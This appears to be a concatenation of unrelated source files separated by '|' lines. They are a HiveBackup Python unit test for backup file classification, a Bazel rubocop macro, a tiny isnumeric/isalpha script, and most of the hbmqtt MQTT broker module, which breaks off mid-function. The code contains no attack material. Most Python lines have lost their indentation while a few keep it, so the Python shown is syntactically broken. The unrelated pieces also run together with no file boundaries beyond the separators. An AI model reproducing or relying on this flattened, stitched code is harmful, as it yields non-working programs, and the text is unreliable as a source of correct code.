local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612xxx", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111xxx", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456114", "~/vault/dir/f1/f_1/f2/testfile_114"])
file_get_list, file_patch_list, file_delete_list = HiveBackup.classify_restore_files(saved_file_list,
local_file_list,
vault_folder)
file_get_list_compare = list()
file_get_list_compare.append(["testfile2", "~/vault/dir/testfile2"])
file_get_list_compare.append(["f1/f_1/f2/testfile_113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_patch_list_compare = list()
file_patch_list_compare.append(["f1/testfile_12", "~/vault/dir/f1/testfile_12"])
file_patch_list_compare.append(["f1/f_1/f2/testfile_111", "~/vault/dir/f1/f_1/f2/testfile_111"])
file_delete_list_compare = list()
file_delete_list_compare.append("~/vault/dir/f1/f_1/f2/testfile_114")
        self.assertEqual(file_get_list, file_get_list_compare)
        self.assertEqual(file_patch_list, file_patch_list_compare)
        self.assertEqual(file_delete_list, file_delete_list_compare)
def test_3_classify_save_files_same(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234562", "testfile2"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456113", "f1/f_1/f2/testfile_113"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_put_list, file_patch_list, file_delete_list = HiveBackup.classify_save_files(saved_file_list,
local_file_list,
vault_folder)
self.assertFalse(file_put_list)
self.assertFalse(file_patch_list)
self.assertFalse(file_delete_list)
def test_3_classify_save_files(self):
vault_folder = Path("~/vault/dir")
saved_file_list = list()
saved_file_list.append(["1234561", "testfile1"])
saved_file_list.append(["1234563", "testfile3"])
saved_file_list.append(["12345611", "f1/testfile_11"])
saved_file_list.append(["12345612x", "f1/testfile_12"])
saved_file_list.append(["12345613", "f1/testfile_13"])
saved_file_list.append(["123456121", "f1/f2/testfile_121"])
saved_file_list.append(["123456122", "f1/f2/testfile_122"])
saved_file_list.append(["123456111x", "f1/f_1/f2/testfile_111"])
saved_file_list.append(["123456112", "f1/f_1/f2/testfile_112"])
saved_file_list.append(["123456114", "f1/f_1/f2/testfile_114"])
local_file_list = list()
local_file_list.append(["1234561", "~/vault/dir/testfile1"])
local_file_list.append(["1234562", "~/vault/dir/testfile2"])
local_file_list.append(["1234563", "~/vault/dir/testfile3"])
local_file_list.append(["12345611", "~/vault/dir/f1/testfile_11"])
local_file_list.append(["12345612", "~/vault/dir/f1/testfile_12"])
local_file_list.append(["12345613", "~/vault/dir/f1/testfile_13"])
local_file_list.append(["123456121", "~/vault/dir/f1/f2/testfile_121"])
local_file_list.append(["123456122", "~/vault/dir/f1/f2/testfile_122"])
local_file_list.append(["123456111", "~/vault/dir/f1/f_1/f2/testfile_111"])
local_file_list.append(["123456112", "~/vault/dir/f1/f_1/f2/testfile_112"])
local_file_list.append(["123456113", "~/vault/dir/f1/f_1/f2/testfile_113"])
file_put_list, file_patch_list, file_delete_list = HiveBackup.classify_save_files(saved_file_list,
local_file_list,
vault_folder)
file_put_list_compare = list()
file_put_list_compare.append(["~/vault/dir/testfile2", "testfile2"])
file_put_list_compare.append(["~/vault/dir/f1/f_1/f2/testfile_113", "f1/f_1/f2/testfile_113"])
file_patch_list_compare = list()
file_patch_list_compare.append(["~/vault/dir/f1/testfile_12", "f1/testfile_12"])
file_patch_list_compare.append(["~/vault/dir/f1/f_1/f2/testfile_111", "f1/f_1/f2/testfile_111"])
file_delete_list_compare = list()
file_delete_list_compare.append("f1/f_1/f2/testfile_114")
        self.assertEqual(file_put_list, file_put_list_compare)
        self.assertEqual(file_patch_list, file_patch_list_compare)
        self.assertEqual(file_delete_list, file_delete_list_compare)
def test_4_inter_put_file(self):
self.init_vault_service(self.host1, self.token1)
self.init_backup_service(self.host2, self.token2)
vc = self.user_did.issue_backup_auth(self.hive_did1, self.host2, self.hive_did2)
vc_json = ffi.string(lib.Credential_ToString(vc, True)).decode()
content = {"backup_credential": vc_json}
host, backup_token, err = view.h_auth.backup_auth_request(content)
self.assertIsNone(err)
input_text = "this is a test put file"
file_name = "test_put_file.txt"
temp = BytesIO()
temp.write(input_text.encode(encoding="utf-8"))
temp.seek(0)
temp.name = 'temp.txt'
url = self.host2 + INTER_BACKUP_FILE_URL + '?file=' + file_name
r = requests.put(url,
data=temp,
headers={"Authorization": "token " + backup_token})
self.assert200(r.status_code)
r = requests.get(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
stream=True,
headers={"Authorization": "token " + backup_token})
        self.assertEqual(r.text, input_text)
r = requests.delete(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
headers={"Authorization": "token " + backup_token})
self.assert200(r.status_code)
r = requests.get(host + INTER_BACKUP_FILE_URL + "?file=" + file_name,
stream=True,
headers={"Authorization": "token " + backup_token})
        self.assertEqual(r.status_code, NOT_FOUND)
|
load("@bazelruby_rules_ruby//ruby/private:binary.bzl", "ruby_binary")
# This wraps a ruby_binary in a script that is executed from the workspace folder
def rubocop(name, bin, deps):
bin_name = name + "-ruby"
ruby_binary(
name = bin_name,
main = bin,
deps = deps,
)
runner = "@bazelruby_rules_ruby//ruby/private/rubocop:runner.sh.tpl"
native.genrule(
name = name,
tools = [bin_name],
srcs = [runner],
executable = True,
outs = [name + ".sh"],
cmd = "sed \"s~{{BIN}}~$(location %s)~g\" $(location %s) > \"$@\"" % (bin_name, runner),
)
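# Illustrative usage from a BUILD file (labels are hypothetical):
#   rubocop(
#       name = "rubocop",
#       bin = "bin/rubocop",
#       deps = ["//:gems"],
#   )
# `bazel run` on the target then executes the generated wrapper script.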
|
n = input('Type a number/letter/word or a short phrase: ')
print(n.isnumeric())
print(n.isalpha())
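# Illustrative behaviour: for n = '123', isnumeric() is True and isalpha() is
# False; for n = 'abc' the reverse holds; 'abc 123' yields False for both.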
|
# Copyright (c) 2015 Nicolas JOUANIN
#
# See the file license.txt for copying permission.
import logging
import ssl
import websockets
import asyncio
import sys
import re
from asyncio import CancelledError
from collections import deque
from functools import partial
from transitions import Machine, MachineError
from hbmqtt.session import Session
from hbmqtt.mqtt.protocol.broker_handler import BrokerProtocolHandler
from hbmqtt.errors import HBMQTTException, MQTTException
from hbmqtt.utils import format_client_message, gen_client_id
from hbmqtt.adapters import (
StreamReaderAdapter,
StreamWriterAdapter,
ReaderAdapter,
WriterAdapter,
WebSocketsReader,
WebSocketsWriter)
from .plugins.manager import PluginManager, BaseContext
_defaults = {
'timeout-disconnect-delay': 2,
'auth': {
'allow-anonymous': True,
'password-file': None
},
}
EVENT_BROKER_PRE_START = 'broker_pre_start'
EVENT_BROKER_POST_START = 'broker_post_start'
EVENT_BROKER_PRE_SHUTDOWN = 'broker_pre_shutdown'
EVENT_BROKER_POST_SHUTDOWN = 'broker_post_shutdown'
EVENT_BROKER_CLIENT_CONNECTED = 'broker_client_connected'
EVENT_BROKER_CLIENT_DISCONNECTED = 'broker_client_disconnected'
EVENT_BROKER_CLIENT_SUBSCRIBED = 'broker_client_subscribed'
EVENT_BROKER_CLIENT_UNSUBSCRIBED = 'broker_client_unsubscribed'
EVENT_BROKER_MESSAGE_RECEIVED = 'broker_message_received'
class BrokerException(BaseException):
pass
class RetainedApplicationMessage:
__slots__ = ('source_session', 'topic', 'data', 'qos')
def __init__(self, source_session, topic, data, qos=None):
self.source_session = source_session
self.topic = topic
self.data = data
self.qos = qos
class Server:
def __init__(self, listener_name, server_instance, max_connections=-1, loop=None):
self.logger = logging.getLogger(__name__)
self.instance = server_instance
self.conn_count = 0
self.listener_name = listener_name
if loop is not None:
self._loop = loop
else:
self._loop = asyncio.get_event_loop()
self.max_connections = max_connections
if self.max_connections > 0:
self.semaphore = asyncio.Semaphore(self.max_connections, loop=self._loop)
else:
self.semaphore = None
@asyncio.coroutine
def acquire_connection(self):
if self.semaphore:
yield from self.semaphore.acquire()
self.conn_count += 1
if self.max_connections > 0:
self.logger.info("Listener '%s': %d/%d connections acquired" %
(self.listener_name, self.conn_count, self.max_connections))
else:
self.logger.info("Listener '%s': %d connections acquired" %
(self.listener_name, self.conn_count))
def release_connection(self):
if self.semaphore:
self.semaphore.release()
self.conn_count -= 1
if self.max_connections > 0:
self.logger.info("Listener '%s': %d/%d connections acquired" %
(self.listener_name, self.conn_count, self.max_connections))
else:
self.logger.info("Listener '%s': %d connections acquired" %
(self.listener_name, self.conn_count))
@asyncio.coroutine
def close_instance(self):
if self.instance:
self.instance.close()
yield from self.instance.wait_closed()
class BrokerContext(BaseContext):
"""
BrokerContext is used as the context passed to plugins interacting with the broker.
    It acts as an adapter exposing broker services to plugins developed for the HBMQTT broker.
"""
def __init__(self, broker):
super().__init__()
self.config = None
self._broker_instance = broker
@asyncio.coroutine
def broadcast_message(self, topic, data, qos=None):
yield from self._broker_instance.internal_message_broadcast(topic, data, qos)
def retain_message(self, topic_name, data, qos=None):
self._broker_instance.retain_message(None, topic_name, data, qos)
@property
def sessions(self):
for k, session in self._broker_instance._sessions.items():
yield session[0]
@property
def retained_messages(self):
return self._broker_instance._retained_messages
@property
def subscriptions(self):
return self._broker_instance._subscriptions
class Broker:
"""
MQTT 3.1.1 compliant broker implementation
    :param config: Broker configuration as a ``dict``, typically loaded from a YAML file (a minimal sketch follows this docstring)
:param loop: asyncio loop to use. Defaults to ``asyncio.get_event_loop()`` if none is given
:param plugin_namespace: Plugin namespace to use when loading plugin entry_points. Defaults to ``hbmqtt.broker.plugins``
"""
    states = ['new', 'starting', 'started', 'not_started', 'stopping', 'stopped', 'not_stopped']
def __init__(self, config=None, loop=None, plugin_namespace=None):
self.logger = logging.getLogger(__name__)
self.config = _defaults
if config is not None:
self.config.update(config)
self._build_listeners_config(self.config)
if loop is not None:
self._loop = loop
else:
self._loop = asyncio.get_event_loop()
self._servers = dict()
self._init_states()
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self._broadcast_queue = asyncio.Queue(loop=self._loop)
self._broadcast_task = None
# Init plugins manager
context = BrokerContext(self)
context.config = self.config
if plugin_namespace:
namespace = plugin_namespace
else:
namespace = 'hbmqtt.broker.plugins'
self.plugins_manager = PluginManager(namespace, context, self._loop)
def _build_listeners_config(self, broker_config):
self.listeners_config = dict()
try:
listeners_config = broker_config['listeners']
defaults = listeners_config['default']
for listener in listeners_config:
config = dict(defaults)
config.update(listeners_config[listener])
self.listeners_config[listener] = config
except KeyError as ke:
raise BrokerException("Listener config not found invalid: %s" % ke)
def _init_states(self):
self.transitions = Machine(states=Broker.states, initial='new')
self.transitions.add_transition(trigger='start', source='new', dest='starting')
self.transitions.add_transition(trigger='starting_fail', source='starting', dest='not_started')
self.transitions.add_transition(trigger='starting_success', source='starting', dest='started')
self.transitions.add_transition(trigger='shutdown', source='started', dest='stopping')
self.transitions.add_transition(trigger='stopping_success', source='stopping', dest='stopped')
self.transitions.add_transition(trigger='stopping_failure', source='stopping', dest='not_stopped')
self.transitions.add_transition(trigger='start', source='stopped', dest='starting')
@asyncio.coroutine
def start(self):
"""
Start the broker to serve with the given configuration
Start method opens network sockets and will start listening for incoming connections.
This method is a *coroutine*.
"""
try:
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self.transitions.start()
self.logger.debug("Broker starting")
except (MachineError, ValueError) as exc:
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.warning("[WARN-0001] Invalid method call at this moment: %s" % exc)
raise BrokerException("Broker instance can't be started: %s" % exc)
yield from self.plugins_manager.fire_event(EVENT_BROKER_PRE_START)
try:
# Start network listeners
for listener_name in self.listeners_config:
listener = self.listeners_config[listener_name]
if 'bind' not in listener:
self.logger.debug("Listener configuration '%s' is not bound" % listener_name)
else:
# Max connections
try:
max_connections = listener['max_connections']
except KeyError:
max_connections = -1
# SSL Context
sc = None
# accept string "on" / "off" or boolean
ssl_active = listener.get('ssl', False)
if isinstance(ssl_active, str):
ssl_active = ssl_active.upper() == 'ON'
if ssl_active:
try:
sc = ssl.create_default_context(
ssl.Purpose.CLIENT_AUTH,
cafile=listener.get('cafile'),
capath=listener.get('capath'),
cadata=listener.get('cadata')
)
sc.load_cert_chain(listener['certfile'], listener['keyfile'])
sc.verify_mode = ssl.CERT_OPTIONAL
except KeyError as ke:
raise BrokerException("'certfile' or 'keyfile' configuration parameter missing: %s" % ke)
except FileNotFoundError as fnfe:
raise BrokerException("Can't read cert files '%s' or '%s' : %s" %
(listener['certfile'], listener['keyfile'], fnfe))
address, s_port = listener['bind'].split(':')
port = 0
try:
port = int(s_port)
except ValueError as ve:
raise BrokerException("Invalid port value in bind value: %s" % listener['bind'])
if listener['type'] == 'tcp':
cb_partial = partial(self.stream_connected, listener_name=listener_name)
instance = yield from asyncio.start_server(cb_partial,
address,
port,
ssl=sc,
loop=self._loop)
self._servers[listener_name] = Server(listener_name, instance, max_connections, self._loop)
elif listener['type'] == 'ws':
cb_partial = partial(self.ws_connected, listener_name=listener_name)
instance = yield from websockets.serve(cb_partial, address, port, ssl=sc, loop=self._loop,
subprotocols=['mqtt'])
self._servers[listener_name] = Server(listener_name, instance, max_connections, self._loop)
self.logger.info("Listener '%s' bind to %s (max_connections=%d)" %
(listener_name, listener['bind'], max_connections))
self.transitions.starting_success()
yield from self.plugins_manager.fire_event(EVENT_BROKER_POST_START)
            # Start broadcast loop
self._broadcast_task = asyncio.ensure_future(self._broadcast_loop(), loop=self._loop)
self.logger.debug("Broker started")
except Exception as e:
self.logger.error("Broker startup failed: %s" % e)
self.transitions.starting_fail()
raise BrokerException("Broker instance can't be started: %s" % e)
@asyncio.coroutine
def shutdown(self):
"""
Stop broker instance.
Closes all connected session, stop listening on network socket and free resources.
"""
try:
self._sessions = dict()
self._subscriptions = dict()
self._retained_messages = dict()
self.transitions.shutdown()
except (MachineError, ValueError) as exc:
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.debug("Invalid method call at this moment: %s" % exc)
raise BrokerException("Broker instance can't be stopped: %s" % exc)
# Fire broker_shutdown event to plugins
yield from self.plugins_manager.fire_event(EVENT_BROKER_PRE_SHUTDOWN)
# Stop broadcast loop
if self._broadcast_task:
self._broadcast_task.cancel()
if self._broadcast_queue.qsize() > 0:
self.logger.warning("%d messages not broadcasted" % self._broadcast_queue.qsize())
for listener_name in self._servers:
server = self._servers[listener_name]
yield from server.close_instance()
self.logger.debug("Broker closing")
self.logger.info("Broker closed")
yield from self.plugins_manager.fire_event(EVENT_BROKER_POST_SHUTDOWN)
self.transitions.stopping_success()
@asyncio.coroutine
def internal_message_broadcast(self, topic, data, qos=None):
return (yield from self._broadcast_message(None, topic, data))
@asyncio.coroutine
def ws_connected(self, websocket, uri, listener_name):
yield from self.client_connected(listener_name, WebSocketsReader(websocket), WebSocketsWriter(websocket))
@asyncio.coroutine
def stream_connected(self, reader, writer, listener_name):
yield from self.client_connected(listener_name, StreamReaderAdapter(reader), StreamWriterAdapter(writer))
@asyncio.coroutine
def client_connected(self, listener_name, reader: ReaderAdapter, writer: WriterAdapter):
# Wait for connection available on listener
server = self._servers.get(listener_name, None)
if not server:
raise BrokerException("Invalid listener name '%s'" % listener_name)
yield from server.acquire_connection()
remote_address, remote_port = writer.get_peer_info()
self.logger.info("Connection from %s:%d on listener '%s'" % (remote_address, remote_port, listener_name))
# Wait for first packet and expect a CONNECT
try:
handler, client_session = yield from BrokerProtocolHandler.init_from_connect(reader, writer, self.plugins_manager, loop=self._loop)
except HBMQTTException as exc:
self.logger.warning("[MQTT-3.1.0-1] %s: Can't read first packet an CONNECT: %s" %
(format_client_message(address=remote_address, port=remote_port), exc))
#yield from writer.close()
self.logger.debug("Connection closed")
return
except MQTTException as me:
self.logger.error('Invalid connection from %s : %s' %
(format_client_message(address=remote_address, port=remote_port), me))
yield from writer.close()
self.logger.debug("Connection closed")
return
if client_session.clean_session:
# Delete existing session and create a new one
if client_session.client_id is not None and client_session.client_id != "":
self.delete_session(client_session.client_id)
else:
client_session.client_id = gen_client_id()
client_session.parent = 0
else:
# Get session from cache
if client_session.client_id in self._sessions:
self.logger.debug("Found old session %s" % repr(self._sessions[client_session.client_id]))
(client_session, h) = self._sessions[client_session.client_id]
client_session.parent = 1
else:
client_session.parent = 0
if client_session.keep_alive > 0:
client_session.keep_alive += self.config['timeout-disconnect-delay']
self.logger.debug("Keep-alive timeout=%d" % client_session.keep_alive)
handler.attach(client_session, reader, writer)
self._sessions[client_session.client_id] = (client_session, handler)
authenticated = yield from self.authenticate(client_session, self.listeners_config[listener_name])
if not authenticated:
yield from writer.close()
server.release_connection() # Delete client from connections list
return
while True:
try:
client_session.transitions.connect()
break
except (MachineError, ValueError):
# Backwards compat: MachineError is raised by transitions < 0.5.0.
self.logger.warning("Client %s is reconnecting too quickly, make it wait" % client_session.client_id)
                # Wait a bit; maybe the client is reconnecting too fast
yield from asyncio.sleep(1, loop=self._loop)
yield from handler.mqtt_connack_authorize(authenticated)
yield from self.plugins_manager.fire_event(EVENT_BROKER_CLIENT_CONNECTED, client_id=client_session.client_id)
self.logger.debug("%s Start messages handling" % client_session.client_id)
yield from handler.start()
self.logger.debug("Retained messages queue size: %d" % client_session.retained_messages.qsize())
yield from self.publish_session_retained_messages(client_session)
# Init and start loop for handling client messages (publish, subscribe/unsubscribe, disconnect)
disconnect_waiter = asyncio.ensure_future(handler.wait_disconnect(), loop=self._loop)
subscribe_waiter = asyncio.ensure_future(handler.get_next_pending_subscription(), loop=self._loop)
unsubscribe_waiter = asyncio.ensure_future(handler.get_next_pending_unsubscription(), loop=self._loop)
wait_deliver = asyncio.ensure_future(handler.mqtt_deliver_next_message(), loop=self._loop)
connected = True
while connected:
try:
done, pending = yield from asyncio.wait(
[disconnect_waiter, subscribe_waiter, unsubscribe_waiter, wait_deliver],
return_when=asyncio.FIRST_COMPLETED, loop=self._loop)
if disconnect_waiter in done:
result = disconnect_waiter.result()
self.logger.debug("%s Result from wait_diconnect: %s" % (client_session.client_id, result))
if result is None:
self.logger.debug("Will flag: %s" % client_session.will_flag)
                        # Connection closed abnormally, send will message
if client_session.will_flag:
self.logger.debug("Client %s disconnected abnormally, sending will message" %
format_client_message(client_session))
yield from self._broadcast_message(
client_session,
client_session.will_topic,
client_session.will_message,
client_session.will_qos)
if client_session.will_retain:
self.retain_message(client_session,
client_session.will_topic,
client_session.will_message,
client_session.will_qos)
self.logger.debug("%s Disconnecting session" % client_session.client_id)
yield from self._stop_handler(handler)
client_session.transitions.disconnect()
yield from self.plugins_manager.fire_event(EVENT_BROKER_CLIENT_DISCONNECTED, client_id=client_session.client_id)
connected = False
if unsubscribe_waiter in done:
self.logger.debug("%s handling unsubscription" % client_session.client_id)
unsubscription = unsubscribe_waiter.result()
for topic in unsubscription['topics']:
self._del_subscription(topic, client_session)
yield from self.plugins_manager.fire_event(
EVENT_BROKER_CLIENT_UNSUBSCRIBED,
client_id=client_session.client_id,
topic=topic)
yield from handler.mqtt_acknowledge_unsubscription(unsubscription['packet_id'])
unsubscribe_waiter = asyncio.Task(handler.get_next_pending_unsubscription(), loop=self._loop)
if subscribe_waiter in done:
self.logger.debug("%s handling subscription" % client_session.client_id)
subscriptions = subscribe_waiter.result()
return_codes = []
for subscription in subscriptions['topics']:
result = yield from self.add_subscription(subscription, client_session)
return_codes.append(result)
yield from handler.mqtt_acknowledge_subscription(subscriptions['packet_id'], return_codes)
for index, subscription in enumerate(subscriptions['topics']):
if return_codes[index] != 0x80:
yield from self.plugins_manager.fire_event(
EVENT_BROKER_CLIENT_SUBSCRIBED,
client_id=client_session.client_id,
topic=subscription[0],
qos=subscription[1])
yield from self.publish_retained_messages_for_subscription(subscription, client_session)
subscribe_waiter = asyncio.Task(handler.get_next_pending_subscription(), loop=self._loop)
self.logger.debug(repr(self._subscriptions))
if wait_deliver in done:
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug("%s handling message delivery" % client_session.client_id)
app_message = wait_deliver.result()
if not app_message.topic:
self.logger.warning("[MQTT-4.7.3-1] - %s invalid TOPIC sent in PUBLISH message, closing connection" % client_session.client_id)
break
if "#" in app_message.topic or "+" in app_message.topic:
self.logger.warning("[MQTT-3.3.2-2] - %s invalid TOPIC sent in PUBLISH message, closing connection" % client_session.client_id)
break
yield from self.plugins_manager.fire_event(EVENT_BROKER_MESSAGE_RECEIVED,
client_id=client_session.client_id,
message=app_message)
yield from self._broadcast_message(client_session, app_message.topic, app_message.data)
if app_message.publish_packet.retain_flag:
self.retain_message(client_session, app_message.topic, app_message.data, app_message.qos)
wait_deliver = asyncio.Task(handler.mqtt_deliver_next_message(), loop=self._loop)
except asyncio.CancelledError:
self.logger.debug("Client loop cancelled")
break
disconnect_waiter.cancel()
subscribe_waiter.cancel()
unsubscribe_waiter.cancel()
wait_deliver.cancel()
self.logger.debug("%s Client disconnected" % client_session.client_id)
server.release_connection()
def _init_handler(self, session, reader, writer):
"""
Create a BrokerProtocolHandler and attach to a session
:return:
"""
handler = BrokerProtocolHandler(self.plugins_manager, self._loop)
handler.attach(session, reader, writer)
return handler
@asyncio.coroutine
def _stop_handler(self, handler):
"""
        Stop a running handler and detach it from the session
:param handler:
:return:
"""
try:
yield from handler.stop()
except Exception as e:
self.logger.error(e)
@asyncio.coroutine
def authenticate(self, session: Session, listener):
"""
        This method calls the authenticate method on registered plugins to test user authentication.
        The user is considered authenticated if all called plugins return True.
        Plugins' authenticate() method is supposed to return:
        - True if user authentication succeeds
        - False if user authentication fails
        - None if authentication can't be achieved (the plugin result is then ignored)
:param session:
:param listener:
:return:
"""
auth_plugins = None
auth_config = self.config.get('auth', None)
if auth_config:
auth_plugins = auth_config.get('plugins', None)
returns = yield from self.plugins_manager.map_plugin_coro(
"authenticate",
session=session,
filter_plugins=auth_plugins)
auth_result = True
if returns:
for plugin in returns:
res = returns[plugin]
if res is False:
auth_result = False
self.logger.debug("Authentication failed due to '%s' plugin result: %s" % (plugin.name, res))
else:
self.logger.debug("'%s' plugin result: %s" % (plugin.name, res))
        # If all plugins returned True, authentication succeeds
return auth_result
@asyncio.coroutine
def topic_filtering(self, session: Session, topic):
"""
        This method calls the topic_filtering method on registered plugins to check that the subscription is allowed.
        The user is considered allowed if all called plugins return True.
        Plugins' topic_filtering() method is supposed to return:
        - True if the MQTT client can subscribe to the topic
        - False if the MQTT client is not allowed to subscribe to the topic
        - None if topic filtering can't be achieved (the plugin result is then ignored)
        :param session:
        :param topic: Topic the client wants to subscribe to
:return:
"""
topic_plugins = None
topic_config = self.config.get('topic-check', None)
if topic_config and topic_config.get('enabled', False):
topic_plugins = topic_config.get('plugins', None)
returns = yield from self.plugins_manager.map_plugin_coro(
"topic_filtering",
session=session,
topic=topic,
filter_plugins=topic_plugins)
topic_result = True
if returns:
for plugin in returns:
res = returns[plugin]
if res is False:
topic_result = False
self.logger.debug("Topic filtering failed due to '%s' plugin result: %s" % (plugin.name, res))
else:
self.logger.debug("'%s' plugin result: %s" % (plugin.name, res))
        # If all plugins returned True, the subscription is allowed
return topic_result
def retain_message(self, source_session, topic_name, data, qos=None):
if data is not None and data != b'':
# If retained flag set, store the message for further subscriptions
self.logger.debug("Retaining message on topic %s" % topic_name)
retained_message = RetainedApplicationMessage(source_session, topic_name, data, qos)
self._retained_messages[topic_name] = retained_message
else:
# [MQTT-3.3.1-10]
if topic_name in self._retained_messages:
self.logger.debug("Clear retained messages for topic '%s'" % topic_name)
del self._retained_messages[topic_name]
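    # Illustrative sketch of the retention rules above; 'broker' and the
    # topic/payload values are hypothetical:
    #
    #   broker.retain_message(session, 'sensors/temp', b'21.5', qos=1)
    #   # -> stored; later subscribers to a matching filter receive it
    #   broker.retain_message(session, 'sensors/temp', b'')
    #   # -> an empty payload clears the retained message [MQTT-3.3.1-10]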
@asyncio.coroutine
def add_subscription(self, subscription, session):
try:
a_filter = subscription[0]
if '#' in a_filter and not a_filter.endswith('#'):
# [MQTT-4.7.1-2] Wildcard character '#' is only allowed as last character in filter
return 0x80
if a_filter != "+":
if '+' in a_filter:
if "/+" not in a_filter and "+/" not in a_filter:
# [MQTT-4.7.1-3] + wildcard character must occupy entire level
return 0x80
# Check if the client is authorised to connect to the topic
permitted = yield from self.topic_filtering(session, topic=a_filter)
if not permitted:
return 0x80
qos = subscription[1]
if 'max-qos' in self.config and qos > self.config['max-qos']:
qos = self.config['max-qos']
if a_filter not in self._subscriptions:
self._subscriptions[a_filter] = []
            already_subscribed = next(
                (s for (s, _) in self._subscriptions[a_filter] if s.client_id == session.client_id), None)
if not already_subscribed:
self._subscriptions[a_filter].append((session, qos))
else:
self.logger.debug("Client %s has already subscribed to %s" % (format_client_message(session=session), a_filter))
return qos
except KeyError:
return 0x80
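    # Illustrative sketch of the filter validation above (0x80 means
    # "subscription refused"); the filter strings are hypothetical:
    #
    #   'sport/#'        -> accepted ('#' is the last character)
    #   'sport/#/stats'  -> 0x80    [MQTT-4.7.1-2]
    #   'sport/+/stats'  -> accepted ('+' occupies a whole level)
    #   'sport/ten+nis'  -> 0x80    [MQTT-4.7.1-3]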
def _del_subscription(self, a_filter, session):
"""
Delete a session subscription on a given topic
:param a_filter:
:param session:
:return:
"""
deleted = 0
try:
subscriptions = self._subscriptions[a_filter]
for index, (sub_session, qos) in enumerate(subscriptions):
if sub_session.client_id == session.client_id:
self.logger.debug("Removing subscription on topic '%s' for client %s" %
(a_filter, format_client_message(session=session)))
subscriptions.pop(index)
deleted += 1
break
        except KeyError:
            # Unsubscribed topic not found in current subscriptions
            pass
        return deleted
def _del_all_subscriptions(self, session):
"""
Delete all topic subscriptions for a given session
:param session:
:return:
"""
filter_queue = deque()
for topic in self._subscriptions:
if self._del_subscription(topic, session):
filter_queue.append(topic)
for topic in filter_queue:
if not self._subscriptions[topic]:
del self._subscriptions[topic]
def matches(self, topic, a_filter):
if "#" not in a_filter and "+" not in a_filter:
# if filter doesn't contain wildcard, return exact match
return a_filter == topic
else:
# else use regex
            # Raw strings avoid invalid escape-sequence warnings; this
            # translation is only an approximation of MQTT matching rules
            match_pattern = re.compile(a_filter.replace('#', '.*').replace('$', r'\$').replace('+', r'[/\$\s\w\d]+'))
return match_pattern.match(topic)
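    # Illustrative sketch of the translation performed above; the filter is
    # hypothetical:
    #
    #   'sport/+/stats'  ->  re.compile(r'sport/[/\$\s\w\d]+/stats')
    #
    # Note the approximation: the '+' character class includes '/', and
    # match() only anchors at the start of the topic, so this is looser
    # than strict MQTT topic matching.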
@asyncio.coroutine
def _broadcast_loop(self):
running_tasks = deque()
try:
while True:
while running_tasks and running_tasks[0].done():
running_tasks.popleft()
broadcast = yield from self._broadcast_queue.get()
if self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug("broadcasting %r" % broadcast)
for k_filter in self._subscriptions:
if broadcast['topic'].startswith("$") and (k_filter.startswith("+") or k_filter.startswith("#")):
self.logger.debug("[MQTT-4.7.2-1] - ignoring brodcasting $ topic to subscriptions starting with + or #")
elif self.matches(broadcast['topic'], k_filter):
subscriptions = self._subscriptions[k_filter]
for (target_session, qos) in subscriptions:
if 'qos' in broadcast:
qos = broadcast['qos']
if target_session.transitions.state == 'connected':
self.logger.debug("broadcasting application message from %s on topic '%s' to %s" %
(format_client_message(session=broadcast['session']),
broadcast['topic'], format_client_message(session=target_session)))
handler = self._get_handler(target_session)
task = asyncio.ensure_future(
handler.mqtt_publish(broadcast['topic'], broadcast['data'], qos, retain=False),
loop=self._loop)
running_tasks.append(task)
else:
self.logger.debug("retaining application message from %s on topic '%s' to client '%s'" %
(format_client_message(session=broadcast['session']),
broadcast['topic'], format_client_message(session=target_session)))
retained_message = RetainedApplicationMessage(
broadcast['session'], broadcast['topic'], broadcast['data'], qos)
yield from target_session.retained_messages.put(retained_message)
except CancelledError:
# Wait until current broadcasting tasks end
if running_tasks:
yield from asyncio.wait(running_tasks, loop=self._loop)
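    # Illustrative sketch of the $-topic rule enforced above: a message on a
    # hypothetical '$SYS/broker/uptime' topic is never delivered to filters
    # starting with '+' or '#' [MQTT-4.7.2-1], while an explicit '$SYS/#'
    # subscription still matches.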
@asyncio.coroutine
def _broadcast_message(self, session, topic, data, force_qos=None):
broadcast = {
'session': session,
'topic': topic,
'data': data
}
        if force_qos is not None:
